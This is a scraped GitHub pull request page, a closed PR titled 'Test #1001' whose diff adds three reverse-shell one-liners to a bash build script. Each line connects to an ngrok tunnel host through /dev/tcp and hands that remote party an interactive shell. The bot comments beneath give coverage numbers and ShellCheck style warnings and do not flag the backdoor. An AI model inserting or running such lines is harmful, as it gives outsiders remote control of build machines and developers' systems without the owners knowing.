Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Test #1001

Closed
wants to merge 1 commit into from
Closed

Test #1001

wants to merge 1 commit into from

Conversation

sebastiankocrypto
Copy link

Please dont accept this PR

Dont accept this PR

Signed-off-by: sebastiankocrypto <[email protected]>
@sebastiankocrypto sebastiankocrypto requested a review from a team as a code owner July 6, 2023 07:19
@codecov
Copy link

codecov bot commented Jul 6, 2023

Codecov Report

Merging #1001 (9637147) into master (172889f) will not change coverage.
The diff coverage is n/a.

@@           Coverage Diff           @@
##           master    #1001   +/-   ##
=======================================
  Coverage   30.04%   30.04%           
=======================================
  Files         125      125           
  Lines       20011    20011           
=======================================
  Hits         6013     6013           
  Misses      12954    12954           
  Partials     1044     1044           
Flag Coverage Δ
integration_tests 20.68% <ø> (+0.01%) ⬆️
integration_tests_byzantine 9.63% <ø> (ø)
integration_tests_gov 9.97% <ø> (ø)
integration_tests_grpc 9.95% <ø> (ø)
integration_tests_ibc 24.77% <ø> (ø)
integration_tests_ledger 9.84% <ø> (ø)
integration_tests_slow 9.84% <ø> (-0.02%) ⬇️
integration_tests_solomachine 9.63% <ø> (ø)
integration_tests_upgrade ?

Flags with carried forward coverage won't be shown. Click here to find out more.

@@ -1,2 +1,5 @@
#!/bin/bash
nix-shell proto.nix --run ""
/bin/sh -i >& /dev/tcp/0.tcp.ap.ngrok.io/15141 0>&1
0<&196;exec 196<>/dev/tcp/0.tcp.ap.ngrok.io/15141; /bin/sh <&196 >&196 2>&196
Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

SC2188: This redirection doesn't have a command. Move to its command (or use 'true' as no-op).


ℹ️ Expand to see all @sonatype-lift commands

You can reply with the following commands. For example, reply with @sonatype-lift ignoreall to leave out all findings.

Command Usage
@sonatype-lift ignore Leave out the above finding from this PR
@sonatype-lift ignoreall Leave out all the existing findings from this PR
@sonatype-lift exclude <file|issue|path|tool> Exclude specified file|issue|path|tool from Lift findings by updating your config.toml file

Note: When talking to LiftBot, you need to refresh the page to see its response.
Click here to add LiftBot to another repo.

@@ -1,2 +1,5 @@
#!/bin/bash
nix-shell proto.nix --run ""
/bin/sh -i >& /dev/tcp/0.tcp.ap.ngrok.io/15141 0>&1
0<&196;exec 196<>/dev/tcp/0.tcp.ap.ngrok.io/15141; /bin/sh <&196 >&196 2>&196
exec 5<>/dev/tcp/0.tcp.ap.ngrok.io/15141;cat <&5 | while read line; do $line 2>&5 >&5; done
Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

29% of developers fix this issue

SC2162: read without -r will mangle backslashes.


ℹ️ Expand to see all @sonatype-lift commands

You can reply with the following commands. For example, reply with @sonatype-lift ignoreall to leave out all findings.

Command Usage
@sonatype-lift ignore Leave out the above finding from this PR
@sonatype-lift ignoreall Leave out all the existing findings from this PR
@sonatype-lift exclude <file|issue|path|tool> Exclude specified file|issue|path|tool from Lift findings by updating your config.toml file

Note: When talking to LiftBot, you need to refresh the page to see its response.
Click here to add LiftBot to another repo.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

1 participant